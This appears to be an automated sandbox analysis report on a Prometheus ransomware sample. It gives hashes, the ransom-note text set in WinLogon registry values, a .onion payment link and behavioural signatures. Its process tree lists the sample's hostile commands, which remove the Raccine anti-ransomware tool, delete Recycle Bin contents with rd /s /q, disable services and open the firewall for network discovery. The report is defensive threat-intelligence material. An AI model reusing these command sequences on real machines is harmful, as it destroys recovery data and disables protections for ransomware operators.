Analysis
-
max time kernel
150s -
max time network
150s -
platform
windows10_x64 -
resource
win10v20210410 -
submitted
28-05-2021 06:53
Static task
static1
Behavioral task
behavioral1
Sample
e1c46a96effc5df063cea2fae83306ae1f0e2f898b0d2ada86c48052be5fe8d3.bin.exe
Resource
win7v20210408
Behavioral task
behavioral2
Sample
e1c46a96effc5df063cea2fae83306ae1f0e2f898b0d2ada86c48052be5fe8d3.bin.exe
Resource
win10v20210410
General
-
Target
e1c46a96effc5df063cea2fae83306ae1f0e2f898b0d2ada86c48052be5fe8d3.bin.exe
-
Size
290KB
-
MD5
a6dcf23059f6e61fa683907c47baf73e
-
SHA1
1d55396b26d97b18256513607dcbe3f308569d5b
-
SHA256
e1c46a96effc5df063cea2fae83306ae1f0e2f898b0d2ada86c48052be5fe8d3
-
SHA512
72ef9997b814807e677e7861a94de3c8c2b7cb350ab79c887de61f505f23ebc2e3db177b34e86f1dedb3017f468e5c6c0f34d188c574e4cbe20410ff1bf596f7
Malware Config
Extracted
C:\Users\Admin\AppData\Local\Temp\RESTORE_FILES_INFO.txt
prometheus
http://promethw27cbrcot.onion/ticket.php?track=AA4-MX4-GGQD
Signatures
-
Prometheus Ransomware
Ransomware family mostly targeting manufacturing industry and claims to be affiliated with REvil.
-
Downloads MZ/PE file
-
Downloads PsExec from SysInternals website 1 IoCs
Sysinternals tools like PsExec are often leveraged maliciously by malware families due to being commonly used by testers/administrators.
Processes:
description flow ioc HTTP URL 15 http://live.sysinternals.com/PsExec64.exe -
Executes dropped EXE 1 IoCs
Processes:
qy5ts0jh.exepid process 4896 qy5ts0jh.exe -
Modifies Windows Firewall 1 TTPs
-
Drops startup file 1 IoCs
Processes:
e1c46a96effc5df063cea2fae83306ae1f0e2f898b0d2ada86c48052be5fe8d3.bin.exedescription ioc process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mystartup.lnk e1c46a96effc5df063cea2fae83306ae1f0e2f898b0d2ada86c48052be5fe8d3.bin.exe -
Modifies file permissions 1 TTPs 3 IoCs
Processes:
icacls.exeicacls.exeicacls.exepid process 4372 icacls.exe 4584 icacls.exe 4432 icacls.exe -
Modifies WinLogon 2 TTPs 2 IoCs
Processes:
e1c46a96effc5df063cea2fae83306ae1f0e2f898b0d2ada86c48052be5fe8d3.bin.exedescription ioc process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\LegalNoticeCaption = "YOUR COMPANY NETWORK HAS BEEN HACKED" e1c46a96effc5df063cea2fae83306ae1f0e2f898b0d2ada86c48052be5fe8d3.bin.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\LegalNoticeText = "All your important files have been encrypted!\r\nYour files are safe! Only modified.(AES) \r\nNo software available on internet can help you.\r\nWe are the only ones able to decrypt your files.\r\n\r\n!!!!!!!!!!!!!!!!!!!!!!!!\r\nIf you decide not to work with us: \r\nAll data on your computers will remain encrypted forever. \r\nYOUR DATA ON OUR SERVER AND WE WILL RELEASE YOUR DATA TO PUBLIC OR RE-SELLER!\r\nSo you can expect your data to be publicly available in the near future.. \r\nThe price will increase over time. \r\n!!!!!!!!!!!!!!!!!!!!!!!!!\r\n\r\nFull information in the file RESTORE_FILES_INFO" e1c46a96effc5df063cea2fae83306ae1f0e2f898b0d2ada86c48052be5fe8d3.bin.exe -
Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Kills process with taskkill 48 IoCs
Processes:
taskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exepid process 1240 taskkill.exe 848 taskkill.exe 4620 taskkill.exe 4844 taskkill.exe 5036 taskkill.exe 5100 taskkill.exe 3376 taskkill.exe 4064 taskkill.exe 2656 taskkill.exe 3396 taskkill.exe 4392 taskkill.exe 4256 taskkill.exe 2200 taskkill.exe 4336 taskkill.exe 1252 taskkill.exe 2876 taskkill.exe 4260 taskkill.exe 4900 taskkill.exe 3524 taskkill.exe 2588 taskkill.exe 2548 taskkill.exe 4204 taskkill.exe 1928 taskkill.exe 4208 taskkill.exe 4400 taskkill.exe 4104 taskkill.exe 2168 taskkill.exe 4016 taskkill.exe 3536 taskkill.exe 3440 taskkill.exe 3788 taskkill.exe 3576 taskkill.exe 4300 taskkill.exe 4372 taskkill.exe 4576 taskkill.exe 1868 taskkill.exe 1952 taskkill.exe 4444 taskkill.exe 3756 taskkill.exe 4164 taskkill.exe 4108 taskkill.exe 4556 taskkill.exe 4712 taskkill.exe 2100 taskkill.exe 3568 taskkill.exe 212 taskkill.exe 2608 taskkill.exe 4948 taskkill.exe -
Modifies registry key 1 TTPs 1 IoCs
-
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
e1c46a96effc5df063cea2fae83306ae1f0e2f898b0d2ada86c48052be5fe8d3.bin.exepid process 3368 e1c46a96effc5df063cea2fae83306ae1f0e2f898b0d2ada86c48052be5fe8d3.bin.exe 3368 e1c46a96effc5df063cea2fae83306ae1f0e2f898b0d2ada86c48052be5fe8d3.bin.exe 3368 e1c46a96effc5df063cea2fae83306ae1f0e2f898b0d2ada86c48052be5fe8d3.bin.exe 3368 e1c46a96effc5df063cea2fae83306ae1f0e2f898b0d2ada86c48052be5fe8d3.bin.exe 3368 e1c46a96effc5df063cea2fae83306ae1f0e2f898b0d2ada86c48052be5fe8d3.bin.exe 3368 e1c46a96effc5df063cea2fae83306ae1f0e2f898b0d2ada86c48052be5fe8d3.bin.exe 3368 e1c46a96effc5df063cea2fae83306ae1f0e2f898b0d2ada86c48052be5fe8d3.bin.exe 3368 e1c46a96effc5df063cea2fae83306ae1f0e2f898b0d2ada86c48052be5fe8d3.bin.exe 3368 e1c46a96effc5df063cea2fae83306ae1f0e2f898b0d2ada86c48052be5fe8d3.bin.exe 3368 e1c46a96effc5df063cea2fae83306ae1f0e2f898b0d2ada86c48052be5fe8d3.bin.exe 3368 e1c46a96effc5df063cea2fae83306ae1f0e2f898b0d2ada86c48052be5fe8d3.bin.exe 3368 e1c46a96effc5df063cea2fae83306ae1f0e2f898b0d2ada86c48052be5fe8d3.bin.exe 3368 e1c46a96effc5df063cea2fae83306ae1f0e2f898b0d2ada86c48052be5fe8d3.bin.exe 3368 e1c46a96effc5df063cea2fae83306ae1f0e2f898b0d2ada86c48052be5fe8d3.bin.exe 3368 e1c46a96effc5df063cea2fae83306ae1f0e2f898b0d2ada86c48052be5fe8d3.bin.exe 3368 e1c46a96effc5df063cea2fae83306ae1f0e2f898b0d2ada86c48052be5fe8d3.bin.exe 3368 e1c46a96effc5df063cea2fae83306ae1f0e2f898b0d2ada86c48052be5fe8d3.bin.exe 3368 e1c46a96effc5df063cea2fae83306ae1f0e2f898b0d2ada86c48052be5fe8d3.bin.exe 3368 e1c46a96effc5df063cea2fae83306ae1f0e2f898b0d2ada86c48052be5fe8d3.bin.exe 3368 e1c46a96effc5df063cea2fae83306ae1f0e2f898b0d2ada86c48052be5fe8d3.bin.exe 3368 e1c46a96effc5df063cea2fae83306ae1f0e2f898b0d2ada86c48052be5fe8d3.bin.exe 3368 e1c46a96effc5df063cea2fae83306ae1f0e2f898b0d2ada86c48052be5fe8d3.bin.exe 3368 e1c46a96effc5df063cea2fae83306ae1f0e2f898b0d2ada86c48052be5fe8d3.bin.exe 3368 e1c46a96effc5df063cea2fae83306ae1f0e2f898b0d2ada86c48052be5fe8d3.bin.exe 3368 e1c46a96effc5df063cea2fae83306ae1f0e2f898b0d2ada86c48052be5fe8d3.bin.exe 3368 e1c46a96effc5df063cea2fae83306ae1f0e2f898b0d2ada86c48052be5fe8d3.bin.exe 3368 e1c46a96effc5df063cea2fae83306ae1f0e2f898b0d2ada86c48052be5fe8d3.bin.exe 3368 e1c46a96effc5df063cea2fae83306ae1f0e2f898b0d2ada86c48052be5fe8d3.bin.exe 3368 e1c46a96effc5df063cea2fae83306ae1f0e2f898b0d2ada86c48052be5fe8d3.bin.exe 3368 e1c46a96effc5df063cea2fae83306ae1f0e2f898b0d2ada86c48052be5fe8d3.bin.exe 3368 e1c46a96effc5df063cea2fae83306ae1f0e2f898b0d2ada86c48052be5fe8d3.bin.exe 3368 e1c46a96effc5df063cea2fae83306ae1f0e2f898b0d2ada86c48052be5fe8d3.bin.exe 3368 e1c46a96effc5df063cea2fae83306ae1f0e2f898b0d2ada86c48052be5fe8d3.bin.exe 3368 e1c46a96effc5df063cea2fae83306ae1f0e2f898b0d2ada86c48052be5fe8d3.bin.exe 3368 e1c46a96effc5df063cea2fae83306ae1f0e2f898b0d2ada86c48052be5fe8d3.bin.exe 3368 e1c46a96effc5df063cea2fae83306ae1f0e2f898b0d2ada86c48052be5fe8d3.bin.exe 3368 e1c46a96effc5df063cea2fae83306ae1f0e2f898b0d2ada86c48052be5fe8d3.bin.exe 3368 e1c46a96effc5df063cea2fae83306ae1f0e2f898b0d2ada86c48052be5fe8d3.bin.exe 3368 e1c46a96effc5df063cea2fae83306ae1f0e2f898b0d2ada86c48052be5fe8d3.bin.exe 3368 e1c46a96effc5df063cea2fae83306ae1f0e2f898b0d2ada86c48052be5fe8d3.bin.exe 3368 e1c46a96effc5df063cea2fae83306ae1f0e2f898b0d2ada86c48052be5fe8d3.bin.exe 3368 e1c46a96effc5df063cea2fae83306ae1f0e2f898b0d2ada86c48052be5fe8d3.bin.exe 3368 e1c46a96effc5df063cea2fae83306ae1f0e2f898b0d2ada86c48052be5fe8d3.bin.exe 3368 e1c46a96effc5df063cea2fae83306ae1f0e2f898b0d2ada86c48052be5fe8d3.bin.exe 3368 e1c46a96effc5df063cea2fae83306ae1f0e2f898b0d2ada86c48052be5fe8d3.bin.exe 3368 e1c46a96effc5df063cea2fae83306ae1f0e2f898b0d2ada86c48052be5fe8d3.bin.exe 3368 e1c46a96effc5df063cea2fae83306ae1f0e2f898b0d2ada86c48052be5fe8d3.bin.exe 3368 e1c46a96effc5df063cea2fae83306ae1f0e2f898b0d2ada86c48052be5fe8d3.bin.exe 3368 e1c46a96effc5df063cea2fae83306ae1f0e2f898b0d2ada86c48052be5fe8d3.bin.exe 3368 e1c46a96effc5df063cea2fae83306ae1f0e2f898b0d2ada86c48052be5fe8d3.bin.exe 3368 e1c46a96effc5df063cea2fae83306ae1f0e2f898b0d2ada86c48052be5fe8d3.bin.exe 3368 e1c46a96effc5df063cea2fae83306ae1f0e2f898b0d2ada86c48052be5fe8d3.bin.exe 3368 e1c46a96effc5df063cea2fae83306ae1f0e2f898b0d2ada86c48052be5fe8d3.bin.exe 3368 e1c46a96effc5df063cea2fae83306ae1f0e2f898b0d2ada86c48052be5fe8d3.bin.exe 3368 e1c46a96effc5df063cea2fae83306ae1f0e2f898b0d2ada86c48052be5fe8d3.bin.exe 3368 e1c46a96effc5df063cea2fae83306ae1f0e2f898b0d2ada86c48052be5fe8d3.bin.exe 3368 e1c46a96effc5df063cea2fae83306ae1f0e2f898b0d2ada86c48052be5fe8d3.bin.exe 3368 e1c46a96effc5df063cea2fae83306ae1f0e2f898b0d2ada86c48052be5fe8d3.bin.exe 3368 e1c46a96effc5df063cea2fae83306ae1f0e2f898b0d2ada86c48052be5fe8d3.bin.exe 3368 e1c46a96effc5df063cea2fae83306ae1f0e2f898b0d2ada86c48052be5fe8d3.bin.exe 3368 e1c46a96effc5df063cea2fae83306ae1f0e2f898b0d2ada86c48052be5fe8d3.bin.exe 3368 e1c46a96effc5df063cea2fae83306ae1f0e2f898b0d2ada86c48052be5fe8d3.bin.exe 3368 e1c46a96effc5df063cea2fae83306ae1f0e2f898b0d2ada86c48052be5fe8d3.bin.exe 3368 e1c46a96effc5df063cea2fae83306ae1f0e2f898b0d2ada86c48052be5fe8d3.bin.exe -
Suspicious use of AdjustPrivilegeToken 49 IoCs
Processes:
e1c46a96effc5df063cea2fae83306ae1f0e2f898b0d2ada86c48052be5fe8d3.bin.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exenetsh.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exeicacls.exeConhost.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exepowershell.exedescription pid process Token: SeDebugPrivilege 3368 e1c46a96effc5df063cea2fae83306ae1f0e2f898b0d2ada86c48052be5fe8d3.bin.exe Token: SeDebugPrivilege 1252 taskkill.exe Token: SeDebugPrivilege 2876 taskkill.exe Token: SeDebugPrivilege 2656 taskkill.exe Token: SeDebugPrivilege 2608 taskkill.exe Token: SeDebugPrivilege 3568 taskkill.exe Token: SeDebugPrivilege 3376 taskkill.exe Token: SeDebugPrivilege 1868 taskkill.exe Token: SeDebugPrivilege 3756 taskkill.exe Token: SeDebugPrivilege 212 netsh.exe Token: SeDebugPrivilege 3396 taskkill.exe Token: SeDebugPrivilege 1952 taskkill.exe Token: SeDebugPrivilege 4064 taskkill.exe Token: SeDebugPrivilege 4016 taskkill.exe Token: SeDebugPrivilege 3440 taskkill.exe Token: SeDebugPrivilege 1240 taskkill.exe Token: SeDebugPrivilege 1928 taskkill.exe Token: SeDebugPrivilege 3788 taskkill.exe Token: SeDebugPrivilege 848 taskkill.exe Token: SeDebugPrivilege 3576 taskkill.exe Token: SeDebugPrivilege 4108 taskkill.exe Token: SeDebugPrivilege 4164 taskkill.exe Token: SeDebugPrivilege 4208 taskkill.exe Token: SeDebugPrivilege 4260 taskkill.exe Token: SeDebugPrivilege 4300 taskkill.exe Token: SeDebugPrivilege 4372 icacls.exe Token: SeDebugPrivilege 4392 Conhost.exe Token: SeDebugPrivilege 4444 taskkill.exe Token: SeDebugPrivilege 4556 taskkill.exe Token: SeDebugPrivilege 4576 taskkill.exe Token: SeDebugPrivilege 4620 taskkill.exe Token: SeDebugPrivilege 4712 taskkill.exe Token: SeDebugPrivilege 4844 taskkill.exe Token: SeDebugPrivilege 4900 taskkill.exe Token: SeDebugPrivilege 4948 taskkill.exe Token: SeDebugPrivilege 5036 taskkill.exe Token: SeDebugPrivilege 5100 taskkill.exe Token: SeDebugPrivilege 3524 taskkill.exe Token: SeDebugPrivilege 2588 taskkill.exe Token: SeDebugPrivilege 2100 taskkill.exe Token: SeDebugPrivilege 3536 taskkill.exe Token: SeDebugPrivilege 2548 taskkill.exe Token: SeDebugPrivilege 4204 taskkill.exe Token: SeDebugPrivilege 4400 taskkill.exe Token: SeDebugPrivilege 4104 taskkill.exe Token: SeDebugPrivilege 2200 taskkill.exe Token: SeDebugPrivilege 2168 taskkill.exe Token: SeDebugPrivilege 4336 taskkill.exe Token: SeDebugPrivilege 4324 powershell.exe -
Suspicious use of FindShellTrayWindow 1 IoCs
Processes:
e1c46a96effc5df063cea2fae83306ae1f0e2f898b0d2ada86c48052be5fe8d3.bin.exepid process 3368 e1c46a96effc5df063cea2fae83306ae1f0e2f898b0d2ada86c48052be5fe8d3.bin.exe -
Suspicious use of SendNotifyMessage 1 IoCs
Processes:
e1c46a96effc5df063cea2fae83306ae1f0e2f898b0d2ada86c48052be5fe8d3.bin.exepid process 3368 e1c46a96effc5df063cea2fae83306ae1f0e2f898b0d2ada86c48052be5fe8d3.bin.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
e1c46a96effc5df063cea2fae83306ae1f0e2f898b0d2ada86c48052be5fe8d3.bin.exedescription pid process target process PID 3368 wrote to memory of 1252 3368 e1c46a96effc5df063cea2fae83306ae1f0e2f898b0d2ada86c48052be5fe8d3.bin.exe taskkill.exe PID 3368 wrote to memory of 1252 3368 e1c46a96effc5df063cea2fae83306ae1f0e2f898b0d2ada86c48052be5fe8d3.bin.exe taskkill.exe PID 3368 wrote to memory of 3372 3368 e1c46a96effc5df063cea2fae83306ae1f0e2f898b0d2ada86c48052be5fe8d3.bin.exe reg.exe PID 3368 wrote to memory of 3372 3368 e1c46a96effc5df063cea2fae83306ae1f0e2f898b0d2ada86c48052be5fe8d3.bin.exe reg.exe PID 3368 wrote to memory of 3488 3368 e1c46a96effc5df063cea2fae83306ae1f0e2f898b0d2ada86c48052be5fe8d3.bin.exe reg.exe PID 3368 wrote to memory of 3488 3368 e1c46a96effc5df063cea2fae83306ae1f0e2f898b0d2ada86c48052be5fe8d3.bin.exe reg.exe PID 3368 wrote to memory of 1264 3368 e1c46a96effc5df063cea2fae83306ae1f0e2f898b0d2ada86c48052be5fe8d3.bin.exe schtasks.exe PID 3368 wrote to memory of 1264 3368 e1c46a96effc5df063cea2fae83306ae1f0e2f898b0d2ada86c48052be5fe8d3.bin.exe schtasks.exe PID 3368 wrote to memory of 2200 3368 e1c46a96effc5df063cea2fae83306ae1f0e2f898b0d2ada86c48052be5fe8d3.bin.exe cmd.exe PID 3368 wrote to memory of 2200 3368 e1c46a96effc5df063cea2fae83306ae1f0e2f898b0d2ada86c48052be5fe8d3.bin.exe cmd.exe PID 3368 wrote to memory of 3944 3368 e1c46a96effc5df063cea2fae83306ae1f0e2f898b0d2ada86c48052be5fe8d3.bin.exe sc.exe PID 3368 wrote to memory of 3944 3368 e1c46a96effc5df063cea2fae83306ae1f0e2f898b0d2ada86c48052be5fe8d3.bin.exe sc.exe PID 3368 wrote to memory of 1748 3368 e1c46a96effc5df063cea2fae83306ae1f0e2f898b0d2ada86c48052be5fe8d3.bin.exe sc.exe PID 3368 wrote to memory of 1748 3368 e1c46a96effc5df063cea2fae83306ae1f0e2f898b0d2ada86c48052be5fe8d3.bin.exe sc.exe PID 3368 wrote to memory of 2120 3368 e1c46a96effc5df063cea2fae83306ae1f0e2f898b0d2ada86c48052be5fe8d3.bin.exe sc.exe PID 3368 wrote to memory of 2120 3368 e1c46a96effc5df063cea2fae83306ae1f0e2f898b0d2ada86c48052be5fe8d3.bin.exe sc.exe PID 3368 wrote to memory of 2648 3368 e1c46a96effc5df063cea2fae83306ae1f0e2f898b0d2ada86c48052be5fe8d3.bin.exe cmd.exe PID 3368 wrote to memory of 2648 3368 e1c46a96effc5df063cea2fae83306ae1f0e2f898b0d2ada86c48052be5fe8d3.bin.exe cmd.exe PID 3368 wrote to memory of 1596 3368 e1c46a96effc5df063cea2fae83306ae1f0e2f898b0d2ada86c48052be5fe8d3.bin.exe sc.exe PID 3368 wrote to memory of 1596 3368 e1c46a96effc5df063cea2fae83306ae1f0e2f898b0d2ada86c48052be5fe8d3.bin.exe sc.exe PID 3368 wrote to memory of 4000 3368 e1c46a96effc5df063cea2fae83306ae1f0e2f898b0d2ada86c48052be5fe8d3.bin.exe sc.exe PID 3368 wrote to memory of 4000 3368 e1c46a96effc5df063cea2fae83306ae1f0e2f898b0d2ada86c48052be5fe8d3.bin.exe sc.exe PID 3368 wrote to memory of 3364 3368 e1c46a96effc5df063cea2fae83306ae1f0e2f898b0d2ada86c48052be5fe8d3.bin.exe sc.exe PID 3368 wrote to memory of 3364 3368 e1c46a96effc5df063cea2fae83306ae1f0e2f898b0d2ada86c48052be5fe8d3.bin.exe sc.exe PID 3368 wrote to memory of 2168 3368 e1c46a96effc5df063cea2fae83306ae1f0e2f898b0d2ada86c48052be5fe8d3.bin.exe sc.exe PID 3368 wrote to memory of 2168 3368 e1c46a96effc5df063cea2fae83306ae1f0e2f898b0d2ada86c48052be5fe8d3.bin.exe sc.exe PID 3368 wrote to memory of 1848 3368 e1c46a96effc5df063cea2fae83306ae1f0e2f898b0d2ada86c48052be5fe8d3.bin.exe sc.exe PID 3368 wrote to memory of 1848 3368 e1c46a96effc5df063cea2fae83306ae1f0e2f898b0d2ada86c48052be5fe8d3.bin.exe sc.exe PID 3368 wrote to memory of 3200 3368 e1c46a96effc5df063cea2fae83306ae1f0e2f898b0d2ada86c48052be5fe8d3.bin.exe netsh.exe PID 3368 wrote to memory of 3200 3368 e1c46a96effc5df063cea2fae83306ae1f0e2f898b0d2ada86c48052be5fe8d3.bin.exe netsh.exe PID 3368 wrote to memory of 2876 3368 e1c46a96effc5df063cea2fae83306ae1f0e2f898b0d2ada86c48052be5fe8d3.bin.exe taskkill.exe PID 3368 wrote to memory of 2876 3368 e1c46a96effc5df063cea2fae83306ae1f0e2f898b0d2ada86c48052be5fe8d3.bin.exe taskkill.exe PID 3368 wrote to memory of 2656 3368 e1c46a96effc5df063cea2fae83306ae1f0e2f898b0d2ada86c48052be5fe8d3.bin.exe taskkill.exe PID 3368 wrote to memory of 2656 3368 e1c46a96effc5df063cea2fae83306ae1f0e2f898b0d2ada86c48052be5fe8d3.bin.exe taskkill.exe PID 3368 wrote to memory of 2608 3368 e1c46a96effc5df063cea2fae83306ae1f0e2f898b0d2ada86c48052be5fe8d3.bin.exe taskkill.exe PID 3368 wrote to memory of 2608 3368 e1c46a96effc5df063cea2fae83306ae1f0e2f898b0d2ada86c48052be5fe8d3.bin.exe taskkill.exe PID 3368 wrote to memory of 3376 3368 e1c46a96effc5df063cea2fae83306ae1f0e2f898b0d2ada86c48052be5fe8d3.bin.exe taskkill.exe PID 3368 wrote to memory of 3376 3368 e1c46a96effc5df063cea2fae83306ae1f0e2f898b0d2ada86c48052be5fe8d3.bin.exe taskkill.exe PID 3368 wrote to memory of 3568 3368 e1c46a96effc5df063cea2fae83306ae1f0e2f898b0d2ada86c48052be5fe8d3.bin.exe taskkill.exe PID 3368 wrote to memory of 3568 3368 e1c46a96effc5df063cea2fae83306ae1f0e2f898b0d2ada86c48052be5fe8d3.bin.exe taskkill.exe PID 3368 wrote to memory of 1868 3368 e1c46a96effc5df063cea2fae83306ae1f0e2f898b0d2ada86c48052be5fe8d3.bin.exe taskkill.exe PID 3368 wrote to memory of 1868 3368 e1c46a96effc5df063cea2fae83306ae1f0e2f898b0d2ada86c48052be5fe8d3.bin.exe taskkill.exe PID 3368 wrote to memory of 3756 3368 e1c46a96effc5df063cea2fae83306ae1f0e2f898b0d2ada86c48052be5fe8d3.bin.exe taskkill.exe PID 3368 wrote to memory of 3756 3368 e1c46a96effc5df063cea2fae83306ae1f0e2f898b0d2ada86c48052be5fe8d3.bin.exe taskkill.exe PID 3368 wrote to memory of 212 3368 e1c46a96effc5df063cea2fae83306ae1f0e2f898b0d2ada86c48052be5fe8d3.bin.exe netsh.exe PID 3368 wrote to memory of 212 3368 e1c46a96effc5df063cea2fae83306ae1f0e2f898b0d2ada86c48052be5fe8d3.bin.exe netsh.exe PID 3368 wrote to memory of 3396 3368 e1c46a96effc5df063cea2fae83306ae1f0e2f898b0d2ada86c48052be5fe8d3.bin.exe taskkill.exe PID 3368 wrote to memory of 3396 3368 e1c46a96effc5df063cea2fae83306ae1f0e2f898b0d2ada86c48052be5fe8d3.bin.exe taskkill.exe PID 3368 wrote to memory of 1952 3368 e1c46a96effc5df063cea2fae83306ae1f0e2f898b0d2ada86c48052be5fe8d3.bin.exe taskkill.exe PID 3368 wrote to memory of 1952 3368 e1c46a96effc5df063cea2fae83306ae1f0e2f898b0d2ada86c48052be5fe8d3.bin.exe taskkill.exe PID 3368 wrote to memory of 4064 3368 e1c46a96effc5df063cea2fae83306ae1f0e2f898b0d2ada86c48052be5fe8d3.bin.exe taskkill.exe PID 3368 wrote to memory of 4064 3368 e1c46a96effc5df063cea2fae83306ae1f0e2f898b0d2ada86c48052be5fe8d3.bin.exe taskkill.exe PID 3368 wrote to memory of 4016 3368 e1c46a96effc5df063cea2fae83306ae1f0e2f898b0d2ada86c48052be5fe8d3.bin.exe taskkill.exe PID 3368 wrote to memory of 4016 3368 e1c46a96effc5df063cea2fae83306ae1f0e2f898b0d2ada86c48052be5fe8d3.bin.exe taskkill.exe PID 3368 wrote to memory of 3440 3368 e1c46a96effc5df063cea2fae83306ae1f0e2f898b0d2ada86c48052be5fe8d3.bin.exe taskkill.exe PID 3368 wrote to memory of 3440 3368 e1c46a96effc5df063cea2fae83306ae1f0e2f898b0d2ada86c48052be5fe8d3.bin.exe taskkill.exe PID 3368 wrote to memory of 1240 3368 e1c46a96effc5df063cea2fae83306ae1f0e2f898b0d2ada86c48052be5fe8d3.bin.exe taskkill.exe PID 3368 wrote to memory of 1240 3368 e1c46a96effc5df063cea2fae83306ae1f0e2f898b0d2ada86c48052be5fe8d3.bin.exe taskkill.exe PID 3368 wrote to memory of 1928 3368 e1c46a96effc5df063cea2fae83306ae1f0e2f898b0d2ada86c48052be5fe8d3.bin.exe taskkill.exe PID 3368 wrote to memory of 1928 3368 e1c46a96effc5df063cea2fae83306ae1f0e2f898b0d2ada86c48052be5fe8d3.bin.exe taskkill.exe PID 3368 wrote to memory of 3788 3368 e1c46a96effc5df063cea2fae83306ae1f0e2f898b0d2ada86c48052be5fe8d3.bin.exe taskkill.exe PID 3368 wrote to memory of 3788 3368 e1c46a96effc5df063cea2fae83306ae1f0e2f898b0d2ada86c48052be5fe8d3.bin.exe taskkill.exe PID 3368 wrote to memory of 3872 3368 e1c46a96effc5df063cea2fae83306ae1f0e2f898b0d2ada86c48052be5fe8d3.bin.exe netsh.exe PID 3368 wrote to memory of 3872 3368 e1c46a96effc5df063cea2fae83306ae1f0e2f898b0d2ada86c48052be5fe8d3.bin.exe netsh.exe -
System policy modification 1 TTPs 2 IoCs
Processes:
e1c46a96effc5df063cea2fae83306ae1f0e2f898b0d2ada86c48052be5fe8d3.bin.exedescription ioc process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\legalnoticecaption = "YOUR COMPANY NETWORK HAS BEEN HACKED" e1c46a96effc5df063cea2fae83306ae1f0e2f898b0d2ada86c48052be5fe8d3.bin.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\legalnoticetext = "All your important files have been encrypted!\r\nYour files are safe! Only modified.(AES) \r\nNo software available on internet can help you.\r\nWe are the only ones able to decrypt your files.\r\n\r\n!!!!!!!!!!!!!!!!!!!!!!!!\r\nIf you decide not to work with us: \r\nAll data on your computers will remain encrypted forever. \r\nYOUR DATA ON OUR SERVER AND WE WILL RELEASE YOUR DATA TO PUBLIC OR RE-SELLER!\r\nSo you can expect your data to be publicly available in the near future.. \r\nThe price will increase over time. \r\n!!!!!!!!!!!!!!!!!!!!!!!!!\r\n\r\nFull information in the file RESTORE_FILES_INFO" e1c46a96effc5df063cea2fae83306ae1f0e2f898b0d2ada86c48052be5fe8d3.bin.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\e1c46a96effc5df063cea2fae83306ae1f0e2f898b0d2ada86c48052be5fe8d3.bin.exe"C:\Users\Admin\AppData\Local\Temp\e1c46a96effc5df063cea2fae83306ae1f0e2f898b0d2ada86c48052be5fe8d3.bin.exe"1⤵
- Drops startup file
- Modifies WinLogon
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
- System policy modification
PID:3368 -
C:\Windows\SYSTEM32\taskkill.exe"taskkill" /F /IM RaccineSettings.exe2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1252
-
-
C:\Windows\SYSTEM32\reg.exe"reg" delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Raccine Tray" /F2⤵PID:3372
-
-
C:\Windows\SYSTEM32\reg.exe"reg" delete HKCU\Software\Raccine /F2⤵
- Modifies registry key
PID:3488
-
-
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /DELETE /TN "Raccine Rules Updater" /F2⤵PID:1264
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd.exe" /c rd /s /q %SYSTEMDRIVE%\\$Recycle.bin2⤵PID:2200
-
-
C:\Windows\SYSTEM32\sc.exe"sc.exe" config FDResPub start= auto2⤵PID:1748
-
-
C:\Windows\SYSTEM32\sc.exe"sc.exe" config SQLTELEMETRY start= disabled2⤵PID:2120
-
-
C:\Windows\SYSTEM32\sc.exe"sc.exe" config Dnscache start= auto2⤵PID:3944
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd.exe" /c rd /s /q D:\\$Recycle.bin2⤵PID:2648
-
-
C:\Windows\SYSTEM32\sc.exe"sc.exe" config SQLTELEMETRY$ECWDB2 start= disabled2⤵PID:4000
-
-
C:\Windows\SYSTEM32\sc.exe"sc.exe" config SstpSvc start= disabled2⤵PID:3364
-
-
C:\Windows\SYSTEM32\sc.exe"sc.exe" config SSDPSRV start= auto2⤵PID:1596
-
-
C:\Windows\SYSTEM32\sc.exe"sc.exe" config upnphost start= auto2⤵PID:2168
-
-
C:\Windows\SYSTEM32\sc.exe"sc.exe" config SQLWriter start= disabled2⤵PID:1848
-
-
C:\Windows\SYSTEM32\netsh.exe"netsh" advfirewall firewall set rule group=\"Network Discovery\" new enable=Yes2⤵PID:3200
-
